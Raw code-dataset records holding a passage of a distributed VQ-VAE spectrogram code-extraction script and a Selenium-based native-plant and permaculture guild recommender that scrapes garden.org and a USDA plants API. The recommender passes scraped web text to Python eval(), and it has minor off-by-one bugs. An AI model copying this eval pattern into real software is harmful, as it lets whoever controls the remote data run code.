make_masked_phase_transform)\r\n\r\nfrom interactive_spectrogram_inpainting.vqvae import encoder_decoder\r\nfrom interactive_spectrogram_inpainting.utils.datasets.lmdb_dataset import (\r\n CodeRow, LMDBDataset)\r\nfrom interactive_spectrogram_inpainting.vqvae.vqvae import (\r\n VQVAE)\r\nfrom interactive_spectrogram_inpainting.utils.datasets.label_encoders import (\r\n dump_label_encoders)\r\nfrom interactive_spectrogram_inpainting.utils.misc import (\r\n expand_path, get_spectrograms_helper)\r\nfrom interactive_spectrogram_inpainting.utils.distributed import (\r\n is_master_process)\r\n\r\n# HOP_LENGTH = 512\r\n# N_FFT = 2048\r\n# FS_HZ = 16000\r\n\r\n\r\ndef extract(lmdb_env, loader: WavToSpectrogramDataLoader,\r\n model: DDP,\r\n device: str,\r\n label_encoders: Mapping[str, LabelEncoder] = {},\r\n ):\r\n codes_db = lmdb_env.open_db(\r\n 'codes'.encode('utf-8'),\r\n dupsort=False # skip duplicate keys\r\n )\r\n\r\n if is_master_process():\r\n with lmdb_env.begin(write=True) as txn:\r\n # store the label encoders along with the database\r\n # this allows for future conversions\r\n txn.put('label_encoders'.encode('utf-8'), pickle.dumps(\r\n label_encoders))\r\n\r\n attribute_names = label_encoders.keys()\r\n\r\n pbar_loader = tqdm(loader)\r\n for (sample_batch, *categorical_attributes_batch,\r\n attributes_batch) in pbar_loader:\r\n sample_batch = sample_batch.to(device)\r\n sample_names = attributes_batch['note_str']\r\n\r\n *_, id_t, id_b = model(sample_batch)\r\n id_t = id_t.detach().cpu().numpy()\r\n id_b = id_b.detach().cpu().numpy()\r\n\r\n for top, bottom, *attributes, sample_name in zip(\r\n id_t, id_b, *categorical_attributes_batch, sample_names):\r\n row = CodeRow(top=top, bottom=bottom,\r\n attributes=dict(zip(attribute_names,\r\n attributes)),\r\n filename=sample_name)\r\n # starting LMDB transaction here to avoid deadlocks on distributed access\r\n with lmdb_env.begin(db=codes_db, write=True) as txn:\r\n txn.put(sample_name.encode('utf-8'), pickle.dumps(row))\r\n # pbar_loader.set_description(f'inserted: {index}')\r\n\r\n # txn.put('length'.encode('utf-8'), str(index).encode('utf-8'))\r\n\r\n\r\nif __name__ == '__main__':\r\n # These are the parameters used to initialize the process group\r\n env_dict = {\r\n key: os.environ[key]\r\n for key in (\"MASTER_ADDR\", \"MASTER_PORT\", \"RANK\", \"WORLD_SIZE\")\r\n }\r\n print(f\"[{os.getpid()}] Initializing process group with: {env_dict}\")\r\n dist.init_process_group(backend=\"nccl\")\r\n\r\n class StoreDictKeyPair(argparse.Action):\r\n def __call__(self, parser, namespace, values, option_string=None):\r\n my_dict = {}\r\n for kv in values.split(\",\"):\r\n k, v = kv.split(\"=\")\r\n my_dict[str(k)] = str(v)\r\n setattr(namespace, self.dest, my_dict)\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--main_output_dir', type=str, required=True)\r\n parser.add_argument('--categorical_fields', type=str, nargs='*',\r\n default=['instrument_family_str', 'pitch'])\r\n parser.add_argument('--batch_size', type=int, default=64)\r\n parser.add_argument('--num_workers', type=int, default=4,\r\n help='Number of worker processes for the Dataloaders')\r\n parser.add_argument('--dataset_audio_directory_paths', type=str,\r\n nargs='+')\r\n parser.add_argument('--named_dataset_json_data_paths',\r\n action=StoreDictKeyPair)\r\n parser.add_argument('--vqvae_weights_path', type=str, required=True)\r\n parser.add_argument('--vqvae_model_parameters_path', type=str,\r\n required=True)\r\n parser.add_argument('--vqvae_training_parameters_path', type=str,\r\n required=True)\r\n parser.add_argument('--size', type=int)\r\n parser.add_argument('--overwrite_existing_dump', action='store_true')\r\n parser.add_argument('--disable_database_creation', action='store_true')\r\n\r\n # DistributedDataParallel arguments\r\n parser.add_argument(\r\n '--local_rank', type=int, default=0,\r\n help=\"This is provided by torch.distributed.launch\")\r\n parser.add_argument(\r\n '--local_world_size', type=int, default=1,\r\n help=\"Number of GPUs per node, required by torch.distributed.launch\")\r\n\r\n args = parser.parse_args()\r\n\r\n MAIN_DIR = pathlib.Path(args.main_output_dir)\r\n\r\n VQVAE_WEIGHTS_PATH = expand_path(args.vqvae_weights_path)\r\n VQVAE_MODEL_PARAMETERS_PATH = expand_path(args.vqvae_model_parameters_path)\r\n VQVAE_TRAINING_PARAMETERS_PATH = expand_path(\r\n args.vqvae_training_parameters_path)\r\n assert (VQVAE_WEIGHTS_PATH.is_file()\r\n and VQVAE_MODEL_PARAMETERS_PATH.is_file()\r\n and VQVAE_MODEL_PARAMETERS_PATH.is_file())\r\n # folder containing the vqvae weights is the ID\r\n vqvae_id = VQVAE_WEIGHTS_PATH.parts[-2]\r\n vqvae_model_filename = VQVAE_WEIGHTS_PATH.stem\r\n\r\n OUTPUT_DIR = MAIN_DIR / f'vqvae-{vqvae_id}-weights-{vqvae_model_filename}/'\r\n\r\n if not args.disable_database_creation and is_master_process():\r\n os.makedirs(OUTPUT_DIR, exist_ok=True)\r\n\r\n device = f'cuda:{args.local_rank}' if torch.cuda.is_available() else 'cpu'\r\n\r\n audio_directory_paths = [expand_path(path)\r\n for path in args.dataset_audio_directory_paths]\r\n\r\n named_dataset_json_data_paths = {\r\n dataset_name: expand_path(json_data_path)\r\n for dataset_name, json_data_path\r\n in args.named_dataset_json_data_paths.items()\r\n }\r\n\r\n assert (len(set(named_dataset_json_data_paths.keys()))\r\n == len(named_dataset_json_data_paths.keys())), (\r\n \"Use unique names for all datasets\"\r\n \"otherwise the outputs will overwrite one another\"\r\n )\r\n\r\n # retrieve n_fft, hop length, window length parameters...\r\n with open(VQVAE_TRAINING_PARAMETERS_PATH, 'r') as f:\r\n vqvae_training_parameters = json.load(f)\r\n with open(VQVAE_MODEL_PARAMETERS_PATH, 'r') as f:\r\n vqvae_model_parameters = json.load(f)\r\n spectrograms_helper = get_spectrograms_helper(**vqvae_training_parameters)\r\n spectrograms_helper.to(device)\r\n\r\n for dataset_name, json_data_path in named_dataset_json_data_paths.items():\r\n assert json_data_path.is_file()\r\n valid_pitch_range = vqvae_training_parameters['valid_pitch_range']\r\n transform: Optional[torchvision.transforms.Lambda] = None\r\n if vqvae_model_parameters['output_spectrogram_min_magnitude'] is not None:\r\n transform = make_masked_phase_transform(\r\n vqvae_model_parameters['output_spectrogram_min_magnitude'])\r\n\r\n print(\"loading dataset\", dataset_name)\r\n nsynth_dataset_with_samples_names = NSynth(\r\n audio_directory_paths=audio_directory_paths,\r\n json_data_path=json_data_path,\r\n valid_pitch_range=valid_pitch_range,\r\n categorical_field_list=args.categorical_fields,\r\n squeeze_mono_channel=True,\r\n return_full_metadata=True,\r\n remove_qualities_str_from_full_metadata=True,\r\n )\r\n\r\n print(\"instantiating wav-to-spectrogram dataloader\", dataset_name)\r\n # converts wavforms to spectrograms on-the-fly on GPU\r\n distributed_sampler = DistributedSampler(\r\n nsynth_dataset_with_samples_names,\r\n shuffle=False)\r\n loader = WavToSpectrogramDataLoader(\r\n nsynth_dataset_with_samples_names,\r\n sampler=distributed_sampler,\r\n spectrograms_helper=spectrograms_helper,\r\n batch_size=args.batch_size,\r\n num_workers=args.num_workers, shuffle=False,\r\n transform=transform,\r\n )\r\n batch_size, in_channel, image_height, image_width = next(iter(loader))[0].shape\r\n image_size = image_height, image_width\r\n print(\"image_size:\", image_size)\r\n\r\n label_encoders = nsynth_dataset_with_samples_names.label_encoders\r\n\r\n encoders: Optional[Mapping[str, Any]] = None\r\n decoders: Optional[Mapping[str, Any]] = None\r\n if vqvae_training_parameters['use_resnet']:\r\n encoders, decoders = encoder_decoder.xresnet_unet_from_json_parameters(\r\n in_channel,\r\n image_size,\r\n VQVAE_TRAINING_PARAMETERS_PATH\r\n )\r\n\r\n vqvae = VQVAE.from_parameters_and_weights(\r\n VQVAE_MODEL_PARAMETERS_PATH,\r\n VQVAE_WEIGHTS_PATH,\r\n encoders=encoders,\r\n decoders=decoders)\r\n\r\n model = vqvae.to(device)\r\n model = nn.SyncBatchNorm.convert_sync_batchnorm(model)\r\n model = DDP(\r\n module=model,\r\n device_ids=[args.local_rank],\r\n output_device=args.local_rank,\r\n find_unused_parameters=True\r\n )\r\n\r\n model.eval()\r\n\r\n # TODO(theis): compute appropriate size for the map,\r\n # for now it's a generous overshoot\r\n map_size = 100 * 1024 * 1024 * 1024\r\n\r\n lmdb_path = expand_path(OUTPUT_DIR / dataset_name)\r\n\r\n if not args.disable_database_creation:\r\n if is_master_process():\r\n os.makedirs(lmdb_path, exist_ok=args.overwrite_existing_dump)\r\n # store command-line parameters\r\n with open(OUTPUT_DIR / 'command_line_parameters.json', 'w') as f:\r\n json.dump(args.__dict__, f, indent=4)\r\n\r\n dump_label_encoders(\r\n nsynth_dataset_with_samples_names.label_encoders,\r\n lmdb_path)\r\n\r\n env = lmdb.open(\r\n str(lmdb_path),\r\n map_size=map_size,\r\n max_dbs=2,\r\n )\r\n with torch.no_grad():\r\n print(\"Start extraction for dataset\", dataset_name)\r\n extract(env, loader, model,\r\n device,\r\n label_encoders=label_encoders)\r\n\r\n print(\"Start sanity-check for dataset\", dataset_name)\r\n # check extracted codes by saving to disk the audio for a batch\r\n # of re-synthesized codemaps\r\n codes_dataset = LMDBDataset(\r\n lmdb_path,\r\n classes_for_conditioning=args.categorical_fields,\r\n dataset_db_name='codes')\r\n\r\n codes_loader = DataLoader(codes_dataset, batch_size=8,\r\n shuffle=True)\r\n\r\n if is_master_process():\r\n with torch.no_grad():\r\n codes_top_sample, codes_bottom_sample, attributes = (\r\n next(iter(codes_loader)))\r\n decoded_sample = model.module.decode_code(\r\n codes_top_sample.to(device),\r\n codes_bottom_sample.to(device))\r\n\r\n def make_audio(mag_and_IF_batch: torch.Tensor) -> np.ndarray:\r\n audio_batch = spectrograms_helper.to_audio(\r\n mag_and_IF_batch)\r\n audio_mono_concatenated = (audio_batch\r\n .flatten().cpu().numpy())\r\n return audio_mono_concatenated\r\n\r\n audio_sample_path = os.path.join(\r\n lmdb_path,\r\n 'vqvae_codes_extraction_samples.wav')\r\n soundfile.write(audio_sample_path,\r\n make_audio(decoded_sample),\r\n samplerate=vqvae_training_parameters['fs_hz'])\r\n print(\"Stored sanity-check decoding of stored codes at\",\r\n audio_sample_path)\r\n","sub_path":"extract_code.py","file_name":"extract_code.py","file_ext":"py","file_size_in_byte":12469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"524481965","text":"import pandas as pd \nimport re\nimport numpy as np\nimport random\nimport selenium\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom collections import defaultdict\n\nclass PlantRecommender:\n \"\"\"A recommender for designing plant guilds and permaculture gardens.\n Uses a REST API for the USDA Plants Database \n (https://github.com/sckott/usdaplantsapi/) and the National Gardening \n Association's plant database (https://garden.org) to recommend plants for \n various uses.\n\n Parameters\n ----------\n soil_texture: string, default='medium'\n Values can be {'coarse', 'medium', 'fine'}, or from the Soil Texture \n Triangle, {'sand', 'coarse_sand', 'fine_sand', 'loamy_coarse_sand', \n 'loamy_fine_sand', 'loamy_very_fine_sand', 'very_fine_sand', \n 'loamy_sand', 'silt', 'sandy_clay_loam', 'very_fine_sandy_loam', \n 'silty_clay_loam', 'silt_loam', 'loam', 'fine_sandy_loam', 'sandy_loam', \n 'coarse_sandy_loam', 'clay_loam', 'sandy_clay', 'silty_clay', 'clay'}.\n \n ph: float, default=6.5\n Soil pH can range from 3.5-9.0. Most plants thrive in soil between 6-7.\n\n moisture: {'high', 'medium' 'low'}, default='medium'\n How much moisture is available.\n\n zone: int, default=7\n USDA hardiness zone. Mapped to min_temp because USDA database uses \n minimum temperature, but hardiness zone is more commonly used.\n\n region: {'northeast', 'southeast', 'midwest', 'plains', 'pacific'}, default=None\n Set to find plants that are native to a specific region.\n\n state: two-letter state sbbreviations, default=None\n set to find plants that are native to a specific state.\n \"\"\"\n\n def __init__(self, soil_texture='medium', ph=6.5, moisture='medium', \n zone=7, region=None, state=None): \n # site parameters \n if soil_texture in {'coarse', 'sand', 'coarse_sand', 'fine_sand', \n 'loamy_coarse_sand', 'loamy_fine_sand', \n 'loamy_very_fine_sand', 'very_fine_sand', \n 'loamy_sand'}:\n self.soil_texture = {'Adapted_to_Coarse_Textured_Soils': 'Yes'}\n elif soil_texture in {'medium', 'silt', 'sandy_clay_loam', \n 'very_fine_sandy_loam', 'silty_clay_loam', \n 'silt_loam', 'loam', 'fine_sandy_loam', 'sandy_loam', \n 'coarse_sandy_loam', 'clay_loam'}:\n self.soil_texture = {'Adapted_to_Medium_Textured_Soils': 'Yes'}\n elif soil_texture in {'fine', 'sandy_clay', 'silty_clay', 'clay'}:\n self.soil_texture = {'Adapted_to_Fine_Textured_Soils': 'Yes'}\n else:\n self.soil_texture = None\n self.ph = ph\n self.moisture = moisture\n hardiness_zone_to_temp = {1:-60, 2:-50, 3:-40, 4:-30, 5:-20, 6:-10, 7:0,\n 8:10, 9:20, 10:30}\n if zone is not None:\n self.min_temp = hardiness_zone_to_temp[zone]\n else:\n self.min_temp = None\n if region is not None:\n regions = {'northeast': ['ME', 'NH', 'VT', 'MA', 'RI', 'CT', 'NY', \n 'NJ', 'PA', 'DE', 'MD', 'WV', 'VA'], \n 'southeast': ['NC', 'TN', 'AR', 'SC', 'GA', 'AL', 'MS', \n 'LA', 'FL'], \n 'midwest': ['MN', 'WI', 'MI', 'IA', 'IL', 'IN', 'OH', \n 'MO', 'KY'],\n 'plains': ['MT', 'ND', 'WY', 'SD', 'NE', 'CO', 'KS', \n 'NM', 'TX', 'OK'],\n 'pacific': ['WA', 'OR', 'ID', 'CA', 'NV', 'UT', 'AZ']}\n self.region = regions[region]\n else:\n self.region = region\n self.state = state \n self.categorical_attributes = ['Genus', 'Species', 'Varieties']\n self.boolean_attributes = ['Coarse Soil', 'Medium Soil', 'Fine Soil']\n self.numeric_attributes = []\n\n options = Options()\n options.headless = True\n self.driver = Firefox(options=options)\n self.usda_url = 'https://plantsdb.xyz/search'\n self.garden_search_url = 'https://garden.org/plants/search/advanced.php'\n self.driver.get(self.garden_search_url)\n # garden.org search parameters\n self.sections = [s for s in self.driver.find_elements_by_xpath('//p') if\n s.text is not '']\n self.plant_habit = self.get_inputs(self.sections[0])\n self.life_cycle = Select(self.sections[1].find_element_by_xpath(\n './/select'))\n self.categorical_attributes.append('Life cycle')\n self.light = self.get_inputs(self.sections[2])\n self.water = self.get_inputs(self.sections[3])\n self.soil_ph = self.get_inputs(self.sections[4])\n self.cold_hardiness = Select(self.sections[5].find_element_by_xpath(\n './/select'))\n self.numeric_attributes.append('Minimum cold hardiness')\n self.maximum_zone = Select(self.sections[6].find_element_by_xpath(\n './/select'))\n self.numeric_attributes.append('Maximum recommended zone')\n self.plant_height = self.sections[7].find_element_by_xpath('.//input')\n self.numeric_attributes.append('Plant Height')\n self.plant_spread = self.sections[8].find_element_by_xpath('.//input')\n self.numeric_attributes.append('Plant Spread')\n self.leaves = self.get_inputs(self.sections[9], 'Leaves_')\n self.fruit = self.get_inputs(self.sections[10], 'Fruit_')\n self.fruiting_time = self.get_inputs(self.sections[11], \n 'Fruiting Time_')\n self.flowers = self.get_inputs(self.sections[12], 'Flowers_')\n self.flower_color = self.get_inputs(self.sections[13],)\n self.bloom_size = self.get_inputs(self.sections[14])\n self.flower_time = self.get_inputs(self.sections[15], 'Flower Time_')\n self.inflorescence_height = self.sections[16].find_element_by_xpath(\n './/input')\n self.numeric_attributes.append('Inflorescence Height')\n self.foliage_mound_height = self.sections[17].find_element_by_xpath(\n './/input')\n self.numeric_attributes.append('Foliage Mound Height')\n self.roots = self.get_inputs(self.sections[18])\n self.locations = self.get_inputs(self.sections[19])\n self.uses = self.get_inputs(self.sections[20])\n self.edible_parts = self.get_inputs(self.sections[21])\n self.eating_methods = self.get_inputs(self.sections[22])\n self.dynamic_accumulator = self.get_inputs(self.sections[23])\n self.wildlife_attract = self.get_inputs(self.sections[24])\n self.resistances = self.get_inputs(self.sections[25])\n self.toxicity = self.get_inputs(self.sections[26])\n # some of these have additional inputs once selected.\n # not implemented yet.\n self.propagation_seed = self.get_inputs(self.sections[27])\n self.propagation_other = self.get_inputs(self.sections[28])\n self.pollinators = self.get_inputs(self.sections[29])\n self.containers = self.get_inputs(self.sections[30])\n self.misc = self.get_inputs(self.sections[31])\n self.awards = self.get_inputs(self.sections[32])\n self.conservation_status = Select(self.sections[33].\n find_element_by_xpath('.//select'))\n self.parentage = self.sections[34].find_element_by_xpath('.//input')\n self.child_plants = self.sections[35].find_element_by_xpath('.//input')\n self.sort_by = Select(self.sections[36].find_element_by_xpath(\n './/select'))\n self.clear_form = self.sections[37].find_element_by_xpath('.//a')\n\n def get_inputs(self, section, field=''):\n inputs = section.find_elements_by_xpath('.//input')\n labels = section.find_elements_by_xpath('.//label')\n self.boolean_attributes += [field+l.text for l in labels]\n return {l.text: i for l,i in zip(labels,inputs)}\n\n def get_results(self):\n \"\"\"Return a dict with the scientific name of each plant returned by a \n query and a list of links to all varieties of that plant.\n Note: self.driver must be on a garden.org results page before calling.\n \"\"\"\n links = self.driver.find_elements_by_xpath('.//a')\n results = defaultdict(list)\n for l in links:\n url = l.get_attribute('href')\n name = re.findall(r'(?<=\\()([A-Z]\\w+ [a-z]\\w+)', l.text)\n if 'plants/view/' in url and len(name) > 0:\n results[name[0]].append(url)\n return results\n\n \n def filter_plants(self, results):\n \"\"\"Cross-reference plants returned from a garden.org query with the USDA\n plants database to remove plants that do not meet requirements and \n return filtered results.\n \"\"\"\n print('Finding native plants', end='')\n plants = pd.DataFrame()\n for name in results.keys():\n print('.', end='')\n plant = {a:None for a in (self.categorical_attributes\n + self.boolean_attributes\n + self.numeric_attributes)}\n genus,species = name.split()\n self.driver.get(f'{self.usda_url}?Genus={genus}&Species={species}')\n self.driver.implicitly_wait(5)\n self.driver.find_element_by_id('rawdata-tab').click()\n data = self.driver.find_element_by_class_name('data')\n try:\n data = eval(data.text.replace('null', 'None'))['data'][0]\n is_native = ('L48 (N)' in data['Native_Status'])\n states = data['State_and_Province']\n states = states[states.index('(')+1:states.index(')')] \n in_location = ((self.state is None and self.region is None) or \n (self.state in states) or \n (len(set(self.region) & set(states)) > 0))\n in_zone = self.min_temp >= eval(data['Temperature_Minimum_F'])\n in_ph_range = ((self.ph >= eval(data['pH_Minimum'])) and \n (self.ph <= eval(data['pH_Maximum'])))\n except:\n continue\n if is_native and in_location and in_zone and in_ph_range:\n plant['Genus'] = genus\n plant['Species'] = species\n plant['Varieties'] = results[name]\n plant['Coarse Soil'] = data['Adapted_to_Coarse_Textured_Soils']=='Yes'\n plant['Medium Soil'] = data['Adapted_to_Medium_Textured_Soils']=='Yes'\n plant['Fine Soil'] = data['Adapted_to_Fine_Textured_Soils']=='Yes' \n self.driver.get(results[name][0])\n table = self.driver.find_element_by_xpath('//caption[contains('\n 'text(),\"General Plant Information\")]/../tbody')\n rows = table.find_elements_by_xpath('.//tr')\n for row in rows:\n field,values = row.find_elements_by_xpath('.//td')\n field = field.text[:-1]\n values = values.text.split('\\n')\n if (field in self.categorical_attributes \n + self.numeric_attributes):\n plant[field] = values[0]\n else:\n for v in values:\n if f'{field}_{v}' in self.boolean_attributes:\n plant[f'{field}_{v}'] = True \n elif v in self.boolean_attributes:\n plant[v] = True\n plants = plants.append(plant, ignore_index=True)\n return plants\n\n # TODO: implement function to search garden.org \n\n def get_all_native_plants(self, new=False):\n \"\"\"Download all native plants from USDA plant database with garden.org \n data\"\"\"\n if new:\n plants = pd.DataFrame()\n else:\n plants = pd.read_csv('all_native_plants.csv') \n options = Options()\n options.headless = True\n for i in range(74200,93000,1000):\n print(f'\\n{i} / 93000')\n self.driver.get(f'{self.usda_url}?limit=1000&offset={i}')\n WebDriverWait(self.driver, 30).until(EC.presence_of_element_located(\n (By.ID, 'rawdata-tab'))).click()\n data_list = WebDriverWait(self.driver, 30).until(\n EC.presence_of_element_located((By.CLASS_NAME, 'data')))\n data_list = eval(data_list.text.replace('null', 'None'))['data']\n for j in range(len(data_list)):\n if j % 10 == 1:\n plants.to_csv('all_native_plants.csv', index=False)\n self.driver.quit()\n self.driver = Firefox(options=options)\n print('.', end='', flush=True)\n plant = {a:None for a in (self.categorical_attributes\n + self.boolean_attributes\n + self.numeric_attributes)}\n data = data_list[j]\n is_native = (('L48 (N)' in data['Native_Status']) or \n ('L48 (N?)' in data['Native_Status']))\n in_df = (plants[['Genus','Species']] == ({k:v for k,v in \n data.items() if k in {'Genus','Species'}})).all(axis=1).any()\n if is_native and not in_df:\n # columns to add: states, coppice, growth (clumping, \n # running, dispersive, etc.), active growth period?, \n # foliage porosity summer?, growth form?, known allelopath?,\n # fertility requitement, height, temperature_minimum_f\n # maybe to add from pfaf: edible and medicinal ratings,\n plant['Genus'] = data['Genus']\n plant['Species'] = data['Species']\n plant['Coarse Soil'] = data['Adapted_to_Coarse_Textured_Soils']=='Yes'\n plant['Medium Soil'] = data['Adapted_to_Medium_Textured_Soils']=='Yes'\n plant['Fine Soil'] = data['Adapted_to_Fine_Textured_Soils']=='Yes' \n self.driver.get(f'https://garden.org/plants/search/text/?q='\n f'{plant[\"Genus\"]}+{plant[\"Species\"]}')\n results = self.get_results()\n plant['Varieties'] = results[f'{plant[\"Genus\"]} '\n f'{plant[\"Species\"]}']\n try: \n self.driver.get(plant['Varieties'][0])\n table = self.driver.find_element_by_xpath('//caption['\n 'contains(text(), \"General Plant Information\")]/../'\n 'tbody')\n except:\n continue\n rows = table.find_elements_by_xpath('.//tr')\n for row in rows:\n field,values = row.find_elements_by_xpath('.//td')\n field = field.text[:-1]\n values = values.text.split('\\n')\n if (field in self.categorical_attributes \n + self.numeric_attributes):\n plant[field] = values[0]\n else:\n for v in values:\n if f'{field}_{v}' in self.boolean_attributes:\n plant[f'{field}_{v}'] = True \n elif v in self.boolean_attributes:\n plant[v] = True\n plants = plants.append(plant, ignore_index=True)\n self.driver.quit()\n\n\n\"\"\"\nconsiderations to implement:\nnumber of layers/plants (2-7)\nroot structures\nshade tolerances (shade tolerant short plants under sun loving tall plants)\ncombine root crops with vigorous plants that need thinning and won't mind the\ndisturbance\nalways include ground cover, nitrogen fixers, and mulchers\ndefine function for each patch\nuse heights of pfaf canopy trees to set height range for all canopy trees. \n\"\"\"\n\nclass GuildRecommender:\n \"\"\"Recommends a group of native plants to be planted together in a guild.\n\n num_layers: int, default=None\n Number of layers to include in guild. Can range from 2-7. If None, a\n random number of layers will be chosen.\n\n zone: int, default=7\n USDA hardiness zone of intended site. Can range from 1-10.\n\n water: {'In Water', 'Wet', 'Wet Mesic', 'Mesic', 'Dry Mesic', 'Dry'}, \n default='Mesic'\n The moisute of the soil at the site.\n\n ph: int, default=6.5\n The pH of the soil at the site.\n \n sun: string, default='Full Sun'\n How much sun is available at the site.\n\n soil_texture: string, default='medium'\n Values can be {'coarse', 'medium', 'fine'}, or from the \n Soil Texture Triangle, {'sand', 'coarse_sand', 'fine_sand', \n 'loamy_coarse_sand', 'loamy_fine_sand', 'loamy_very_fine_sand', \n 'very_fine_sand', 'loamy_sand', 'silt', 'sandy_clay_loam', \n 'very_fine_sandy_loam', 'silty_clay_loam', 'silt_loam', 'loam', \n 'fine_sandy_loam', 'sandy_loam', 'coarse_sandy_loam', 'clay_loam', \n 'sandy_clay', 'silty_clay', 'clay'}.\n\n include_trees: boolean, defualt=True\n Whether or not trees can be considered when creating guilds.\n\n edible_only: boolean, default=False\n Whether only edible plants can be considered when creating guilds.\n\n perennial_only: boolean, default=True\n Whether only perennial plants will be considered when creating guilds.\n \"\"\"\n\n def __init__(self, num_layers=None, zone=7, water='Mesic', ph=6.5, \n sun='Full Sun', soil_texture='medium', include_trees=True, \n edible_only=False, perennial_only=True):\n if num_layers==None:\n self.num_layers = random.randint(2,7)\n else:\n self.num_layers = num_layers \n self.zone = zone \n self.water = water \n if ph < 4.5:\n self.ph = 'Extremely acid (3.5 – 4.4)'\n elif ph < 5.1:\n self.ph = 'Very strongly acid (4.5 – 5.0)'\n elif ph < 5.6:\n self.ph = 'Strongly acid (5.1 – 5.5)'\n elif ph < 6.1:\n self.ph = 'Moderately acid (5.6 – 6.0)'\n elif ph < 6.6:\n self.ph = 'Slightly acid (6.1 – 6.5)'\n elif ph < 7.4:\n self.ph = 'Neutral (6.6 – 7.3)'\n elif ph < 7.9:\n self.ph = 'Slightly alkaline (7.4 – 7.8)'\n elif ph < 8.5:\n self.ph = 'Moderately alkaline (7.9 – 8.4)'\n else:\n self.ph = 'Strongly alkaline (8.5 – 9.0)'\n sun_list = ['Full Sun', 'Full Sun to Partial Shade',\n 'Partial or Dappled Shade', 'Partial Shade to Full Shade', \n 'Full Shade']\n self.sun = sun_list[sun_list.index(sun):]\n if soil_texture in {'coarse', 'sand', 'coarse_sand', 'fine_sand', \n 'loamy_coarse_sand', 'loamy_fine_sand', \n 'loamy_very_fine_sand', 'very_fine_sand', \n 'loamy_sand'}:\n self.soil_texture = 'Coarse Soil'\n elif soil_texture in {'medium', 'silt', 'sandy_clay_loam', \n 'very_fine_sandy_loam', 'silty_clay_loam', \n 'silt_loam', 'loam', 'fine_sandy_loam', 'sandy_loam', \n 'coarse_sandy_loam', 'clay_loam'}:\n self.soil_texture = 'Medium Soil'\n elif soil_texture in {'fine', 'sandy_clay', 'silty_clay', 'clay'}:\n self.soil_texture = 'Fine Soil'\n self.habits = {'Herb/Forb', 'Shrub', 'Tree', 'Cactus/Succulent', \n 'Grass/Grass-like', 'Fern', 'Vine'}\n plants = pd.read_csv('all_native_plants.csv')\n plants = plants[(plants['Minimum cold hardiness']<=zone) & \n ((plants['Maximum recommended zone']==np.nan) | \n (plants['Maximum recommended zone']>=zone))]\n self.plants = pd.DataFrame()\n for s in self.sun:\n self.plants = self.plants.append(plants[plants[s]==True], \n ignore_index=True)\n self.plants = self.plants[self.plants[self.ph]==True]\n self.plants = self.plants[self.plants[self.water]==True]\n self.plants = self.plants[self.plants[self.soil_texture]==True]\n if edible_only:\n self.plants = self.plants[(self.plants['Seeds or Nuts']==True) | \n (self.plants['Stem']==True) | (self.plants['Leaves']==True) | \n (self.plants['Roots']==True) | (self.plants['Bark']==True) |\n (self.plants['Sap']==True) | (self.plants['Fruit']==True) | \n (self.plants['Flowers']==True)]\n self.include_trees = include_trees\n if not self.include_trees:\n self.plants = self.plants[self.plants['Tree']!=True]\n if perennial_only:\n self.plants = self.plants[self.plants['Life cycle']=='Perennial']\n\n def create_guild(self):\n n_fixers = False\n if self.include_trees:\n all_layers = ['canopy', 'understory', 'shrub', 'herb','rhizome', \n 'vine']\n guild_layers = random.sample(all_layers, self.num_layers-1)\n else:\n all_layers = ['shrub', 'herb', 'rhizome', 'vine']\n guild_layers = random.choices(all_layers, self.num_layers-1)\n guild = pd.DataFrame()\n canopy = None\n understory = None\n shrub = None\n herb = None\n groundcover = None \n rhizome = None \n vine = None \n if 'canopy' in guild_layers:\n canopies = self.plants[(self.plants['Tree']==True) & \n (self.plants[self.sun[0]]==True)]\n canopy = canopies.iloc[random.randint(0, len(canopies))]\n guild = guild.append(canopy, ignore_index=True)\n if 'understory' in guild_layers:\n all_understories = self.plants[self.plants['Tree']==True]\n understories = pd.DataFrame()\n if 'canopy' in guild_layers:\n for s in self.sun[1:]:\n understories = understories.append(all_understories[\n all_understories[s]==True], ignore_index=True) \n canopy_height = canopy['Min Height']\n if canopy_height is not np.nan:\n understories = understories[understories['Max Height'] < \n canopy_height]\n else:\n understories = understories[understories['Max Height'] < 50]\n else:\n understories = all_understories[all_understories[self.sun[0]]==\n True]\n understories = understories[understories['Max Height'] < 50]\n understory = understories.iloc[random.randint(0, len(understories))]\n guild = guild.append(understory, ignore_index=True)\n canopy_present = 'canopy' in guild_layers\n understory_present = 'understory' in guild_layers\n if 'shrub' in guild_layers:\n shrub = self.get_lower_plants(['Shrub'], canopy_present, understory_present) \n guild = guild.append(shrub, ignore_index=True)\n if 'herb' in guild_layers:\n herb = self.get_lower_plants(['Herb/Forb', 'Fern'], canopy_present, \n understory_present)\n guild = guild.append(herb, ignore_index=True)\n if 'vine' in guild_layers:\n vine = self.get_lower_plants(['Vine'], canopy_present, understory_present)\n guild = guild.append(vine, ignore_index=True)\n if 'rhizome' in guild_layers:\n rhizome = self.get_lower_plants(['Rhizome', 'Tuber'], canopy_present, \n understory_present)\n guild = guild.append(rhizome, ignore_index=True)\n n_fixers = (guild['Nitrogen fixer'] == True).any()\n groundcover = self.get_lower_plants(['Groundcover'], canopy_present,\n understory_present, n_fixers)\n guild = guild.append(groundcover, ignore_index=True)\n return guild\n \n\n\n def get_lower_plants(self, layers, canopy_present, understory_present, n_fix=True):\n all_in_layer = pd.DataFrame()\n for l in layers:\n all_in_layer = all_in_layer.append(self.plants[self.plants[l]==True])\n if not n_fix:\n all_in_layer = all_in_layer[all_in_layer['Nitrogen fixer']==True]\n selected = pd.DataFrame()\n if canopy_present or understory_present:\n for s in self.sun[1:]:\n selected = selected.append(all_in_layer[all_in_layer[s]==True])\n else:\n selected = all_in_layer[all_in_layer[self.sun[0]]==True]\n plant = selected.iloc[random.randint(0, len(selected))]\n return plant\n\n# TODO: include 'Leaves Spring ephemeral' with herbs that grow later'\n# TODO: add method to get columns and add option to filter by specified columns\n","sub_path":"plants/plants.py","file_name":"plants.py","file_ext":"py","file_size_in_byte":25465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"645696721","text":"import datetime\r\nimport json\r\nimport os\r\nimport boto3\r\n\r\nfrom pyspark.sql.functions import col\r\nfrom pyspark.sql import 